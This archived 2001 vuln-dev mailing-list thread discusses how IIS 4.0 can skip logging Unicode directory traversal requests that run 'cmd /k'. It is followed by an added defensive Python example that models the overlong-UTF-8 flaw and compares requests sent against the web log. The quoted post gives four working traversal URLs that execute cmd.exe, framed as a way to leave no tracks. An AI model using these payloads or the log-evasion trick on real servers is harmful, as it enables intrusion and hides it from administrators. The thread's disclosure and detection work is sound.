Pablo Aravena said:
> The problem looks like this:
>
> CMD /K [command]   Execute a command and "still active"
> CMD /C [command]   Execute a command and then finished.
>
> If you execute a cmd.exe?/k request, this would be in an active state
> until it has finished this process, instead of the cmd.exe?/c request,
> which finishes the process immediately. Because of this, IIS does
> not log the process that has not come to an end.

That's right, but if an attacker sends a remote request to "cmd /k", no
"cmd" process will appear in the web server's list of processes. This is
unusual behaviour, because if a local user of the NT box calls "cmd /k"
locally, that process will appear in the list of processes.

In addition, if the attacker calls "cmd /k" remotely, his browser will
seem to be waiting for the web server's answer (that happens because CMD
is still running due to the "K" option), so if he stops the browser
(pressing ESC) he will stop the remote "cmd /k" process, but IIS doesn't
log it.

Roberto Alamos M. (theyeat_private)
www.350cc.com

> > -----Original Message-----
> > From: ThEye [SMTP:theyeat_private]
> > Sent: Thursday, 20 December 2001 0:39
> > To: vuln-devat_private
> > CC: ndr113at_private
> > Subject: sometimes IIS 4.0 don't write logs.
> >
> > Hi:
> >
> > I don't know if this problem is documented, but I didn't find anything
> > about it anywhere.
> >
> > The problem is the following one:
> >
> > + Problem:
> > When I was playing with "Microsoft IIS and PWS Extended Unicode Directory
> > Traversal Vulnerability" (BugtraqID = 1806) I found that if the attacker
> > uses the "k" option of cmd (cmd /k) instead of the "c" option (cmd /c),
> > IIS 4.0 (with the Extended Unicode Directory Traversal Vulnerability)
> > sometimes doesn't write logs of the attacker's activity.
> >
> > + Implications:
> > If an attacker uses this vulnerability to crack a web page or anything,
> > eventually no tracks will exist on the attacked server.
> >
> > + Final:
> > In PROBLEM I said "sometimes" because after a high number of requests to
> > "cmd /k", IIS 4.0 writes logs of some requests; still, I don't know when
> > and why IIS 4.0 writes logs of the "cmd /k" request.
> > Anyone that can confirm or refute this, please post it.
> >
> > + Exploit:
> > I tested this problem on Windows NT Server 4.0 with IIS 4.0 just installed
> > (without any patch).
> >
> > http://server.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/k+dir
> > http://server.com/scripts/..%c0%af../winnt/system32/cmd.exe?/k+dir
> > http://server.com/msadc/..%c1%pc../winnt/system32/cmd.exe?/k+dir
> > http://server.com/msadc/..%c0%af../winnt/system32/cmd.exe?/k+dir
> >
> > Result: No tracks on log files.
> >
> > + More Information:
> > 1) Microsoft IIS and PWS Extended Unicode Directory Traversal
> >    http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=1806
> > 2) Microsoft Patch prmcan4i
> >    http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/EN-US/prmcan4i.exe
> >
> > Roberto Alamos M. (theyeat_private)
> > www.350cc.com
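The thread turns on two things a defender would want to see in code: why `..%c0%af..` walks out of the virtual directory at all, and how to notice that requests which were sent never reached the log. The block below is an added example, not code from the original post or from Microsoft. It models the overlong-UTF-8 decoding behind BugtraqID 1806 (`%c0%af` is the overlong two-byte form of `/`, `%c1%9c` the overlong form of `\`; the `%c1%pc` in the posted URLs is not valid percent-encoding, so the example uses `%c1%9c`), and then reconciles a list of requests sent against W3C-format log lines. The request list, the log lines and the `#Fields:` layout are constructed for the example; whether IIS 4.0 logged the URI stem exactly as received is an assumption.

```python
"""Added example (not from the original post): a lenient UTF-8 decoder that
reproduces the overlong-sequence flaw behind the Unicode traversal, plus a
reconciliation of sent requests against the W3C log lines that survived.
Sample requests and log lines are constructed; the field layout is assumed."""
from urllib.parse import unquote_to_bytes


def lenient_utf8(data: bytes) -> str:
    """Decode UTF-8 while accepting overlong two-byte forms.  A strict decoder
    rejects C0 AF ('/' = 0x2F) and C1 9C ('\\' = 0x5C); the vulnerable path
    canonicaliser did not.  Only the two-byte overlong case is modelled;
    any other non-ASCII byte becomes U+FFFD."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def decode_stem(stem: str, lenient: bool):
    """Percent-decode a URI stem, then UTF-8-decode it strictly or leniently.
    Backslashes are folded to '/' as Windows path handling does.
    Returns None when strict decoding rejects the bytes (the overlong case)."""
    raw = unquote_to_bytes(stem)
    if lenient:
        text = lenient_utf8(raw)
    else:
        try:
            text = raw.decode("utf-8")
        except UnicodeDecodeError:
            return None
    return text.replace("\\", "/")


def escapes_root(path: str) -> bool:
    """True if '..' segments climb above the web root the path starts at."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def parse_w3c(lines):
    """Yield one dict per record of a W3C extended log; the '#Fields:' header
    names the columns (the layout below is an assumption for the example)."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            yield dict(zip(fields, line.split()))


def traversal_hits(lines):
    """(stem, query) of logged requests whose stem, decoded leniently, climbs
    above the web root: the traversal attempts that did make it into the log."""
    hits = []
    for rec in parse_w3c(lines):
        stem = rec["cs-uri-stem"]
        if escapes_root(decode_stem(stem, lenient=True)):
            hits.append((stem, rec.get("cs-uri-query", "-")))
    return hits


def missing_from_log(sent, lines):
    """Requests (stem, query) that were sent but have no matching log record,
    which is the gap the thread describes for 'cmd /k' requests."""
    logged = {(r["cs-uri-stem"], r.get("cs-uri-query", "-")) for r in parse_w3c(lines)}
    return [req for req in sent if req not in logged]


# Constructed sample data: four requests sent, the two "/k" ones never logged.
SENT = [
    ("/scripts/..%c0%af../winnt/system32/cmd.exe", "/c+dir"),
    ("/scripts/..%c0%af../winnt/system32/cmd.exe", "/k+dir"),
    ("/msadc/..%c1%9c../winnt/system32/cmd.exe", "/c+dir"),
    ("/msadc/..%c1%9c../winnt/system32/cmd.exe", "/k+dir"),
]
LOG = """#Software: Microsoft Internet Information Server 4.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-12-20 00:39:01 10.0.0.5 GET /default.htm - 200
2001-12-20 00:39:05 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-12-20 00:39:09 10.0.0.5 GET /msadc/..%c1%9c../winnt/system32/cmd.exe /c+dir 200
""".splitlines()

if __name__ == "__main__":
    for hit in traversal_hits(LOG):
        print("traversal in log:", hit)
    for req in missing_from_log(SENT, LOG):
        print("sent but never logged:", req)
```

The practical point of `missing_from_log` is that the web server's own log cannot be the only record: the requests that never reached it are exactly the ones the thread is about, so the sent-side list has to come from somewhere else (a proxy, a network capture, or a test harness), and the comparison is only meaningful if both sides record the stem and query in the same encoding.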
This archive was generated by hypermail 2b30 : Thu Dec 20 2001 - 12:19:33 PST